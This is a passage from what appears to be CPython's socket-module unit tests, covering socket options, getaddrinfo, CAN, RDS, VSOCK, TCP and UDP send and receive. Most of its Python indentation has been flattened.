f(b'\x0a\xef\x0b\x01\x05\x06\x10\x01\xff\xff\x99\x97\x00\x55\x01\x70')
)
self.assertEqual('::1', f(bytearray(b'\x00' * 15 + b'\x01')))
assertInvalid(b'\x12' * 15)
assertInvalid(b'\x12' * 17)
assertInvalid(b'\x12' * 4)
# XXX The following don't test module-level functionality...
def testSockName(self):
# Testing getsockname()
port = support.find_unused_port()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
sock.bind(("0.0.0.0", port))
name = sock.getsockname()
        # XXX(nnorwitz): http://tinyurl.com/os5jz seems to indicate that it is
        # reasonable to get the host's addr in addition to 0.0.0.0, at least
        # for eCos.  This is required for the S/390 to pass.
try:
my_ip_addr = socket.gethostbyname(socket.gethostname())
except OSError:
# Probably name lookup wasn't set up right; skip this test
self.skipTest('name lookup failure')
self.assertIn(name[0], ("0.0.0.0", my_ip_addr), '%s invalid' % name[0])
self.assertEqual(name[1], port)
def testGetSockOpt(self):
# Testing getsockopt()
        # A new socket should start with SO_REUSEADDR disabled (reuse == 0)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
reuse = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)
self.assertFalse(reuse != 0, "initial mode is reuse")
def testSetSockOpt(self):
# Testing setsockopt()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
reuse = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)
self.assertFalse(reuse == 0, "failed to set reuse mode")
def testSendAfterClose(self):
# testing send() after close() with timeout
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(1)
sock.close()
self.assertRaises(OSError, sock.send, b"spam")
def testCloseException(self):
sock = socket.socket()
socket.socket(fileno=sock.fileno()).close()
try:
sock.close()
except OSError as err:
# Winsock apparently raises ENOTSOCK
self.assertIn(err.errno, (errno.EBADF, errno.ENOTSOCK))
else:
self.fail("close() should raise EBADF/ENOTSOCK")
def testNewAttributes(self):
# testing .family, .type and .protocol
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.assertEqual(sock.family, socket.AF_INET)
if hasattr(socket, 'SOCK_CLOEXEC'):
self.assertIn(sock.type,
(socket.SOCK_STREAM | socket.SOCK_CLOEXEC,
socket.SOCK_STREAM))
else:
self.assertEqual(sock.type, socket.SOCK_STREAM)
self.assertEqual(sock.proto, 0)
sock.close()
def test_getsockaddrarg(self):
sock = socket.socket()
self.addCleanup(sock.close)
port = support.find_unused_port()
big_port = port + 65536
neg_port = port - 65536
self.assertRaises(OverflowError, sock.bind, (HOST, big_port))
self.assertRaises(OverflowError, sock.bind, (HOST, neg_port))
# Since find_unused_port() is inherently subject to race conditions, we
# call it a couple times if necessary.
for i in itertools.count():
port = support.find_unused_port()
try:
sock.bind((HOST, port))
except OSError as e:
if e.errno != errno.EADDRINUSE or i == 5:
raise
else:
break
@unittest.skipUnless(os.name == "nt", "Windows specific")
def test_sock_ioctl(self):
self.assertTrue(hasattr(socket.socket, 'ioctl'))
self.assertTrue(hasattr(socket, 'SIO_RCVALL'))
self.assertTrue(hasattr(socket, 'RCVALL_ON'))
self.assertTrue(hasattr(socket, 'RCVALL_OFF'))
self.assertTrue(hasattr(socket, 'SIO_KEEPALIVE_VALS'))
s = socket.socket()
self.addCleanup(s.close)
self.assertRaises(ValueError, s.ioctl, -1, None)
s.ioctl(socket.SIO_KEEPALIVE_VALS, (1, 100, 100))
@unittest.skipUnless(os.name == "nt", "Windows specific")
@unittest.skipUnless(hasattr(socket, 'SIO_LOOPBACK_FAST_PATH'),
'Loopback fast path support required for this test')
def test_sio_loopback_fast_path(self):
s = socket.socket()
self.addCleanup(s.close)
try:
s.ioctl(socket.SIO_LOOPBACK_FAST_PATH, True)
except OSError as exc:
WSAEOPNOTSUPP = 10045
if exc.winerror == WSAEOPNOTSUPP:
                self.skipTest("SIO_LOOPBACK_FAST_PATH is defined but "
                              "not implemented in this Windows version")
raise
self.assertRaises(TypeError, s.ioctl, socket.SIO_LOOPBACK_FAST_PATH, None)
def testGetaddrinfo(self):
try:
socket.getaddrinfo('localhost', 80)
except socket.gaierror as err:
if err.errno == socket.EAI_SERVICE:
# see http://bugs.python.org/issue1282647
self.skipTest("buggy libc version")
raise
        # every sequence returned by getaddrinfo() is supposed to have length 5
for info in socket.getaddrinfo(HOST, None):
self.assertEqual(len(info), 5)
# host can be a domain name, a string representation of an
# IPv4/v6 address or None
socket.getaddrinfo('localhost', 80)
socket.getaddrinfo('127.0.0.1', 80)
socket.getaddrinfo(None, 80)
if support.IPV6_ENABLED:
socket.getaddrinfo('::1', 80)
# port can be a string service name such as "http", a numeric
# port number or None
# Issue #26936: Android getaddrinfo() was broken before API level 23.
if (not hasattr(sys, 'getandroidapilevel') or
sys.getandroidapilevel() >= 23):
socket.getaddrinfo(HOST, "http")
socket.getaddrinfo(HOST, 80)
socket.getaddrinfo(HOST, None)
# test family and socktype filters
infos = socket.getaddrinfo(HOST, 80, socket.AF_INET, socket.SOCK_STREAM)
for family, type, _, _, _ in infos:
self.assertEqual(family, socket.AF_INET)
self.assertEqual(str(family), 'AddressFamily.AF_INET')
self.assertEqual(type, socket.SOCK_STREAM)
self.assertEqual(str(type), 'SocketKind.SOCK_STREAM')
infos = socket.getaddrinfo(HOST, None, 0, socket.SOCK_STREAM)
for _, socktype, _, _, _ in infos:
self.assertEqual(socktype, socket.SOCK_STREAM)
# test proto and flags arguments
socket.getaddrinfo(HOST, None, 0, 0, socket.SOL_TCP)
socket.getaddrinfo(HOST, None, 0, 0, 0, socket.AI_PASSIVE)
# a server willing to support both IPv4 and IPv6 will
# usually do this
socket.getaddrinfo(None, 0, socket.AF_UNSPEC, socket.SOCK_STREAM, 0,
socket.AI_PASSIVE)
# test keyword arguments
a = socket.getaddrinfo(HOST, None)
b = socket.getaddrinfo(host=HOST, port=None)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, socket.AF_INET)
b = socket.getaddrinfo(HOST, None, family=socket.AF_INET)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, socket.SOCK_STREAM)
b = socket.getaddrinfo(HOST, None, type=socket.SOCK_STREAM)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, 0, socket.SOL_TCP)
b = socket.getaddrinfo(HOST, None, proto=socket.SOL_TCP)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, 0, 0, socket.AI_PASSIVE)
b = socket.getaddrinfo(HOST, None, flags=socket.AI_PASSIVE)
self.assertEqual(a, b)
a = socket.getaddrinfo(None, 0, socket.AF_UNSPEC, socket.SOCK_STREAM, 0,
socket.AI_PASSIVE)
b = socket.getaddrinfo(host=None, port=0, family=socket.AF_UNSPEC,
type=socket.SOCK_STREAM, proto=0,
flags=socket.AI_PASSIVE)
self.assertEqual(a, b)
# Issue #6697.
self.assertRaises(UnicodeEncodeError, socket.getaddrinfo, 'localhost', '\uD800')
        # Issue 17269: test the workaround for an OS X platform bug (segfault)
if hasattr(socket, 'AI_NUMERICSERV'):
try:
# The arguments here are undefined and the call may succeed
                # or fail.  All we care about here is that it doesn't segfault.
socket.getaddrinfo("localhost", None, 0, 0, 0,
socket.AI_NUMERICSERV)
except socket.gaierror:
pass
def test_getnameinfo(self):
# only IP addresses are allowed
self.assertRaises(OSError, socket.getnameinfo, ('mail.python.org',0), 0)
@unittest.skipUnless(support.is_resource_enabled('network'),
'network is not enabled')
def test_idna(self):
# Check for internet access before running test
# (issue #12804, issue #25138).
with support.transient_internet('python.org'):
socket.gethostbyname('python.org')
# these should all be successful
domain = 'испытание.pythontest.net'
socket.gethostbyname(domain)
socket.gethostbyname_ex(domain)
socket.getaddrinfo(domain,0,socket.AF_UNSPEC,socket.SOCK_STREAM)
            # this may not work if the forward lookup chooses the IPv6 address, as that doesn't
# have a reverse entry yet
# socket.gethostbyaddr('испытание.python.org')
def check_sendall_interrupted(self, with_timeout):
# socketpair() is not strictly required, but it makes things easier.
if not hasattr(signal, 'alarm') or not hasattr(socket, 'socketpair'):
self.skipTest("signal.alarm and socket.socketpair required for this test")
# Our signal handlers clobber the C errno by calling a math function
# with an invalid domain value.
def ok_handler(*args):
self.assertRaises(ValueError, math.acosh, 0)
def raising_handler(*args):
self.assertRaises(ValueError, math.acosh, 0)
1 // 0
c, s = socket.socketpair()
old_alarm = signal.signal(signal.SIGALRM, raising_handler)
try:
if with_timeout:
# Just above the one second minimum for signal.alarm
c.settimeout(1.5)
with self.assertRaises(ZeroDivisionError):
signal.alarm(1)
c.sendall(b"x" * support.SOCK_MAX_SIZE)
if with_timeout:
signal.signal(signal.SIGALRM, ok_handler)
signal.alarm(1)
self.assertRaises(socket.timeout, c.sendall,
b"x" * support.SOCK_MAX_SIZE)
finally:
signal.alarm(0)
signal.signal(signal.SIGALRM, old_alarm)
c.close()
s.close()
def test_sendall_interrupted(self):
self.check_sendall_interrupted(False)
def test_sendall_interrupted_with_timeout(self):
self.check_sendall_interrupted(True)
def test_dealloc_warn(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
r = repr(sock)
with self.assertWarns(ResourceWarning) as cm:
sock = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
# An open socket file object gets dereferenced after the socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
f = sock.makefile('rb')
r = repr(sock)
sock = None
support.gc_collect()
with self.assertWarns(ResourceWarning):
f = None
support.gc_collect()
def test_name_closed_socketio(self):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
fp = sock.makefile("rb")
fp.close()
self.assertEqual(repr(fp), "<_io.BufferedReader name=-1>")
def test_unusable_closed_socketio(self):
with socket.socket() as sock:
fp = sock.makefile("rb", buffering=0)
self.assertTrue(fp.readable())
self.assertFalse(fp.writable())
self.assertFalse(fp.seekable())
fp.close()
self.assertRaises(ValueError, fp.readable)
self.assertRaises(ValueError, fp.writable)
self.assertRaises(ValueError, fp.seekable)
def test_makefile_mode(self):
for mode in 'r', 'rb', 'rw', 'w', 'wb':
with self.subTest(mode=mode):
with socket.socket() as sock:
with sock.makefile(mode) as fp:
self.assertEqual(fp.mode, mode)
def test_makefile_invalid_mode(self):
for mode in 'rt', 'x', '+', 'a':
with self.subTest(mode=mode):
with socket.socket() as sock:
with self.assertRaisesRegex(ValueError, 'invalid mode'):
sock.makefile(mode)
def test_pickle(self):
sock = socket.socket()
with sock:
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
self.assertRaises(TypeError, pickle.dumps, sock, protocol)
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
family = pickle.loads(pickle.dumps(socket.AF_INET, protocol))
self.assertEqual(family, socket.AF_INET)
type = pickle.loads(pickle.dumps(socket.SOCK_STREAM, protocol))
self.assertEqual(type, socket.SOCK_STREAM)
def test_listen_backlog(self):
for backlog in 0, -1:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
srv.bind((HOST, 0))
srv.listen(backlog)
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
srv.bind((HOST, 0))
srv.listen()
@support.cpython_only
def test_listen_backlog_overflow(self):
# Issue 15989
import _testcapi
srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
srv.bind((HOST, 0))
self.assertRaises(OverflowError, srv.listen, _testcapi.INT_MAX + 1)
srv.close()
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
def test_flowinfo(self):
self.assertRaises(OverflowError, socket.getnameinfo,
(support.HOSTv6, 0, 0xffffffff), 0)
with socket.socket(socket.AF_INET6, socket.SOCK_STREAM) as s:
self.assertRaises(OverflowError, s.bind, (support.HOSTv6, 0, -10))
def test_str_for_enums(self):
# Make sure that the AF_* and SOCK_* constants have enum-like string
# reprs.
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
self.assertEqual(str(s.family), 'AddressFamily.AF_INET')
self.assertEqual(str(s.type), 'SocketKind.SOCK_STREAM')
@unittest.skipIf(os.name == 'nt', 'Will not work on Windows')
    def test_unknown_socket_family_repr(self):
# Test that when created with a family that's not one of the known
# AF_*/SOCK_* constants, socket.family just returns the number.
#
# To do this we fool socket.socket into believing it already has an
        # open fd, because on this path it doesn't actually verify the family
        # and type; it just populates the socket object.
#
# On Windows this trick won't work, so the test is skipped.
fd, path = tempfile.mkstemp()
self.addCleanup(os.unlink, path)
with socket.socket(family=42424, type=13331, fileno=fd) as s:
self.assertEqual(s.family, 42424)
self.assertEqual(s.type, 13331)
@unittest.skipUnless(hasattr(os, 'sendfile'), 'test needs os.sendfile()')
def test__sendfile_use_sendfile(self):
class File:
def __init__(self, fd):
self.fd = fd
def fileno(self):
return self.fd
with socket.socket() as sock:
fd = os.open(os.curdir, os.O_RDONLY)
os.close(fd)
with self.assertRaises(socket._GiveupOnSendfile):
sock._sendfile_use_sendfile(File(fd))
with self.assertRaises(OverflowError):
sock._sendfile_use_sendfile(File(2**1000))
with self.assertRaises(TypeError):
sock._sendfile_use_sendfile(File(None))
@unittest.skipUnless(HAVE_SOCKET_CAN, 'SocketCan required for this test.')
class BasicCANTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_CAN
socket.PF_CAN
socket.CAN_RAW
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testBCMConstants(self):
socket.CAN_BCM
# opcodes
socket.CAN_BCM_TX_SETUP # create (cyclic) transmission task
socket.CAN_BCM_TX_DELETE # remove (cyclic) transmission task
socket.CAN_BCM_TX_READ # read properties of (cyclic) transmission task
socket.CAN_BCM_TX_SEND # send one CAN frame
socket.CAN_BCM_RX_SETUP # create RX content filter subscription
socket.CAN_BCM_RX_DELETE # remove RX content filter subscription
socket.CAN_BCM_RX_READ # read properties of RX content filter subscription
socket.CAN_BCM_TX_STATUS # reply to TX_READ request
socket.CAN_BCM_TX_EXPIRED # notification on performed transmissions (count=0)
socket.CAN_BCM_RX_STATUS # reply to RX_READ request
socket.CAN_BCM_RX_TIMEOUT # cyclic message is absent
socket.CAN_BCM_RX_CHANGED # updated CAN frame (detected content change)
def testCreateSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
pass
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testCreateBCMSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_BCM) as s:
pass
def testBindAny(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
s.bind(('', ))
def testTooLongInterfaceName(self):
# most systems limit IFNAMSIZ to 16, take 1024 to be sure
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
self.assertRaisesRegex(OSError, 'interface name too long',
s.bind, ('x' * 1024,))
@unittest.skipUnless(hasattr(socket, "CAN_RAW_LOOPBACK"),
'socket.CAN_RAW_LOOPBACK required for this test.')
def testLoopback(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
for loopback in (0, 1):
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_LOOPBACK,
loopback)
self.assertEqual(loopback,
s.getsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_LOOPBACK))
@unittest.skipUnless(hasattr(socket, "CAN_RAW_FILTER"),
'socket.CAN_RAW_FILTER required for this test.')
def testFilter(self):
can_id, can_mask = 0x200, 0x700
can_filter = struct.pack("=II", can_id, can_mask)
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, can_filter)
self.assertEqual(can_filter,
s.getsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, 8))
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, bytearray(can_filter))
@unittest.skipUnless(HAVE_SOCKET_CAN, 'SocketCan required for this test.')
class CANTest(ThreadedCANSocketTest):
def __init__(self, methodName='runTest'):
ThreadedCANSocketTest.__init__(self, methodName=methodName)
@classmethod
def build_can_frame(cls, can_id, data):
"""Build a CAN frame."""
can_dlc = len(data)
data = data.ljust(8, b'\x00')
return struct.pack(cls.can_frame_fmt, can_id, can_dlc, data)
@classmethod
def dissect_can_frame(cls, frame):
"""Dissect a CAN frame."""
can_id, can_dlc, data = struct.unpack(cls.can_frame_fmt, frame)
return (can_id, can_dlc, data[:can_dlc])
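    # Illustrative sketch only (not part of the tests): can_frame_fmt is
    # assumed to be inherited from the CAN socket test base class and to
    # follow the <linux/can.h> struct can_frame layout, typically "=IB3x8s"
    # (32-bit CAN id, 8-bit DLC, 3 pad bytes, 8 data bytes).  For example:
    #
    #     build_can_frame(0x123, b'\x01\x02')
    #     # -> struct.pack("=IB3x8s", 0x123, 2, b'\x01\x02' + b'\x00' * 6)
    #
    # and dissect_can_frame() reverses this, returning only the first
    # can_dlc bytes of the data field.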
def testSendFrame(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
self.assertEqual(addr[0], self.interface)
self.assertEqual(addr[1], socket.AF_CAN)
def _testSendFrame(self):
self.cf = self.build_can_frame(0x00, b'\x01\x02\x03\x04\x05')
self.cli.send(self.cf)
def testSendMaxFrame(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
def _testSendMaxFrame(self):
self.cf = self.build_can_frame(0x00, b'\x07' * 8)
self.cli.send(self.cf)
def testSendMultiFrames(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf1, cf)
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf2, cf)
def _testSendMultiFrames(self):
self.cf1 = self.build_can_frame(0x07, b'\x44\x33\x22\x11')
self.cli.send(self.cf1)
self.cf2 = self.build_can_frame(0x12, b'\x99\x22\x33')
self.cli.send(self.cf2)
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def _testBCM(self):
cf, addr = self.cli.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
can_id, can_dlc, data = self.dissect_can_frame(cf)
self.assertEqual(self.can_id, can_id)
self.assertEqual(self.data, data)
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testBCM(self):
bcm = socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_BCM)
self.addCleanup(bcm.close)
bcm.connect((self.interface,))
self.can_id = 0x123
self.data = bytes([0xc0, 0xff, 0xee])
self.cf = self.build_can_frame(self.can_id, self.data)
opcode = socket.CAN_BCM_TX_SEND
flags = 0
count = 0
ival1_seconds = ival1_usec = ival2_seconds = ival2_usec = 0
bcm_can_id = 0x0222
nframes = 1
assert len(self.cf) == 16
header = struct.pack(self.bcm_cmd_msg_fmt,
opcode,
flags,
count,
ival1_seconds,
ival1_usec,
ival2_seconds,
ival2_usec,
bcm_can_id,
nframes,
)
header_plus_frame = header + self.cf
bytes_sent = bcm.send(header_plus_frame)
self.assertEqual(bytes_sent, len(header_plus_frame))
@unittest.skipUnless(HAVE_SOCKET_CAN_ISOTP, 'CAN ISOTP required for this test.')
class ISOTPTest(unittest.TestCase):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.interface = "vcan0"
def testCrucialConstants(self):
socket.AF_CAN
socket.PF_CAN
socket.CAN_ISOTP
socket.SOCK_DGRAM
def testCreateSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
pass
@unittest.skipUnless(hasattr(socket, "CAN_ISOTP"),
'socket.CAN_ISOTP required for this test.')
def testCreateISOTPSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP) as s:
pass
def testTooLongInterfaceName(self):
# most systems limit IFNAMSIZ to 16, take 1024 to be sure
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP) as s:
with self.assertRaisesRegex(OSError, 'interface name too long'):
s.bind(('x' * 1024, 1, 2))
def testBind(self):
try:
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP) as s:
addr = self.interface, 0x123, 0x456
s.bind(addr)
self.assertEqual(s.getsockname(), addr)
except OSError as e:
if e.errno == errno.ENODEV:
self.skipTest('network interface `%s` does not exist' %
self.interface)
else:
raise
@unittest.skipUnless(HAVE_SOCKET_RDS, 'RDS sockets required for this test.')
class BasicRDSTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_RDS
socket.PF_RDS
def testCreateSocket(self):
with socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0) as s:
pass
def testSocketBufferSize(self):
bufsize = 16384
with socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0) as s:
s.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, bufsize)
s.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, bufsize)
@unittest.skipUnless(HAVE_SOCKET_RDS, 'RDS sockets required for this test.')
class RDSTest(ThreadedRDSSocketTest):
def __init__(self, methodName='runTest'):
ThreadedRDSSocketTest.__init__(self, methodName=methodName)
def setUp(self):
super().setUp()
self.evt = threading.Event()
def testSendAndRecv(self):
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
self.assertEqual(self.cli_addr, addr)
def _testSendAndRecv(self):
self.data = b'spam'
self.cli.sendto(self.data, 0, (HOST, self.port))
def testPeek(self):
data, addr = self.serv.recvfrom(self.bufsize, socket.MSG_PEEK)
self.assertEqual(self.data, data)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
def _testPeek(self):
self.data = b'spam'
self.cli.sendto(self.data, 0, (HOST, self.port))
@requireAttrs(socket.socket, 'recvmsg')
def testSendAndRecvMsg(self):
data, ancdata, msg_flags, addr = self.serv.recvmsg(self.bufsize)
self.assertEqual(self.data, data)
@requireAttrs(socket.socket, 'sendmsg')
def _testSendAndRecvMsg(self):
self.data = b'hello ' * 10
self.cli.sendmsg([self.data], (), 0, (HOST, self.port))
def testSendAndRecvMulti(self):
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data1, data)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data2, data)
def _testSendAndRecvMulti(self):
self.data1 = b'bacon'
self.cli.sendto(self.data1, 0, (HOST, self.port))
self.data2 = b'egg'
self.cli.sendto(self.data2, 0, (HOST, self.port))
def testSelect(self):
r, w, x = select.select([self.serv], [], [], 3.0)
self.assertIn(self.serv, r)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
def _testSelect(self):
self.data = b'select'
self.cli.sendto(self.data, 0, (HOST, self.port))
def testCongestion(self):
# wait until the sender is done
self.evt.wait()
def _testCongestion(self):
# test the behavior in case of congestion
self.data = b'fill'
self.cli.setblocking(False)
try:
# try to lower the receiver's socket buffer size
self.cli.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 16384)
except OSError:
pass
with self.assertRaises(OSError) as cm:
try:
# fill the receiver's socket buffer
while True:
self.cli.sendto(self.data, 0, (HOST, self.port))
finally:
# signal the receiver we're done
self.evt.set()
# sendto() should have failed with ENOBUFS
self.assertEqual(cm.exception.errno, errno.ENOBUFS)
# and we should have received a congestion notification through poll
r, w, x = select.select([self.serv], [], [], 3.0)
self.assertIn(self.serv, r)
@unittest.skipIf(fcntl is None, "need fcntl")
@unittest.skipUnless(HAVE_SOCKET_VSOCK,
'VSOCK sockets required for this test.')
class BasicVSOCKTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_VSOCK
def testVSOCKConstants(self):
socket.SO_VM_SOCKETS_BUFFER_SIZE
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE
socket.VMADDR_CID_ANY
socket.VMADDR_PORT_ANY
socket.VMADDR_CID_HOST
socket.VM_SOCKETS_INVALID_VERSION
socket.IOCTL_VM_SOCKETS_GET_LOCAL_CID
def testCreateSocket(self):
with socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM) as s:
pass
def testSocketBufferSize(self):
with socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM) as s:
orig_max = s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE)
orig = s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_SIZE)
orig_min = s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE)
s.setsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE, orig_max * 2)
s.setsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_SIZE, orig * 2)
s.setsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE, orig_min * 2)
self.assertEqual(orig_max * 2,
s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE))
self.assertEqual(orig * 2,
s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_SIZE))
self.assertEqual(orig_min * 2,
s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE))
class BasicTCPTest(SocketConnectedTest):
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def testRecv(self):
# Testing large receive over TCP
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, MSG)
def _testRecv(self):
self.serv_conn.send(MSG)
def testOverFlowRecv(self):
# Testing receive in chunks over TCP
seg1 = self.cli_conn.recv(len(MSG) - 3)
seg2 = self.cli_conn.recv(1024)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testOverFlowRecv(self):
self.serv_conn.send(MSG)
def testRecvFrom(self):
# Testing large recvfrom() over TCP
msg, addr = self.cli_conn.recvfrom(1024)
self.assertEqual(msg, MSG)
def _testRecvFrom(self):
self.serv_conn.send(MSG)
def testOverFlowRecvFrom(self):
# Testing recvfrom() in chunks over TCP
seg1, addr = self.cli_conn.recvfrom(len(MSG)-3)
seg2, addr = self.cli_conn.recvfrom(1024)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testOverFlowRecvFrom(self):
self.serv_conn.send(MSG)
def testSendAll(self):
# Testing sendall() with a 2048 byte string over TCP
msg = b''
        while True:
read = self.cli_conn.recv(1024)
if not read:
break
msg += read
self.assertEqual(msg, b'f' * 2048)
def _testSendAll(self):
big_chunk = b'f' * 2048
self.serv_conn.sendall(big_chunk)
def testFromFd(self):
# Testing fromfd()
fd = self.cli_conn.fileno()
sock = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
self.assertIsInstance(sock, socket.socket)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testFromFd(self):
self.serv_conn.send(MSG)
def testDup(self):
# Testing dup()
sock = self.cli_conn.dup()
self.addCleanup(sock.close)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testDup(self):
self.serv_conn.send(MSG)
def testShutdown(self):
# Testing shutdown()
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, MSG)
# wait for _testShutdown to finish: on OS X, when the server
# closes the connection the client also becomes disconnected,
# and the client's shutdown call will fail. (Issue #4397.)
self.done.wait()
def _testShutdown(self):
self.serv_conn.send(MSG)
self.serv_conn.shutdown(2)
testShutdown_overflow = support.cpython_only(testShutdown)
@support.cpython_only
def _testShutdown_overflow(self):
import _testcapi
self.serv_conn.send(MSG)
# Issue 15989
self.assertRaises(OverflowError, self.serv_conn.shutdown,
_testcapi.INT_MAX + 1)
self.assertRaises(OverflowError, self.serv_conn.shutdown,
2 + (_testcapi.UINT_MAX + 1))
self.serv_conn.shutdown(2)
def testDetach(self):
# Testing detach()
fileno = self.cli_conn.fileno()
f = self.cli_conn.detach()
self.assertEqual(f, fileno)
# cli_conn cannot be used anymore...
self.assertTrue(self.cli_conn._closed)
self.assertRaises(OSError, self.cli_conn.recv, 1024)
self.cli_conn.close()
# ...but we can create another socket using the (still open)
# file descriptor
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=f)
self.addCleanup(sock.close)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testDetach(self):
self.serv_conn.send(MSG)
class BasicUDPTest(ThreadedUDPSocketTest):
def __init__(self, methodName='runTest'):
ThreadedUDPSocketTest.__init__(self, methodName=methodName)
def testSendtoAndRecv(self):
        # Testing sendto() and recv() over UDP
msg = self.serv.recv(len(MSG))
self.assertEqual(msg, MSG)
def _testSendtoAndRecv(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFrom(self):
# Testing recvfrom() over UDP
msg, addr = self.serv.recvfrom(len(MSG))
self.assertEqual(msg, MSG)
def _testRecvFrom(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFromNegative(self):
# Negative lengths passed to recvfrom should give ValueError.
self.assertRaises(ValueError, self.serv.recvfrom, -1)
def _testRecvFromNegative(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
# Tests for the sendmsg()/recvmsg() interface. Where possible, the
# same test code is used with different families and types of socket
# (e.g. stream, datagram), and tests using recvmsg() are repeated
# using recvmsg_into().
#
# The generic test classes such as SendmsgTests and
# RecvmsgGenericTests inherit from SendrecvmsgBase and expect to be
# supplied with sockets cli_sock and serv_sock representing the
